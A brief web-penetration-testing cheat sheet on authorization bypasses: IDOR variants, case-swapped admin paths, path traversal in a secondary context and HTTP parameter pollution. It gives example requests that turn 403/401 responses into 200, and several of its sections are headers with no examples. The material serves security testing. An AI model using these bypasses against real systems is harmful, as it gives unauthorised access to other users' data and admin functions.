Insecure Direct Object Reference (IDOR)

Change HTTP method

GET /users/delete/123 -> 403
POST /users/delete/123 -> 200

Change file extension

Try to change the extension of the endpoint that you have.
#Endpoint found
/users/password -> 401
#Endpoints to test

Convert request body

Convert the body of the request to array or to include a json on it.
#Original body

Test wildcards

Change the identifier of the request to a wildcard.
#Original request
#Wildcard bypasses

Check another version

Many API endpoints expose the version in the request, try to change it to use another older.
#Original request
#Changed version of the same endpoint

Missing Function Level Access Control (MFLAC)

GET /admin/profile -> 401
GET /ADMIN/profile -> 200

Path Traversal Secondary Context

#Original request
POST /users/delete/123 -> 403
POST /users/delete/MY_ID/../123 -> 200

HTTP Parameter Pollution

GET /api/v1/messages?user_id=ATACKER_ID&user_id=VICTIM_ID
GET /api/v1/messages?user_id=VICTIM_ID&user_id=ATACKER_ID


Burp Suite extension aimed at helping the penetration tester to detect authorization vulnerabilities
Auto Repeater
Burp Suite extension that automatically repeats requests, with replacement rules and response diffing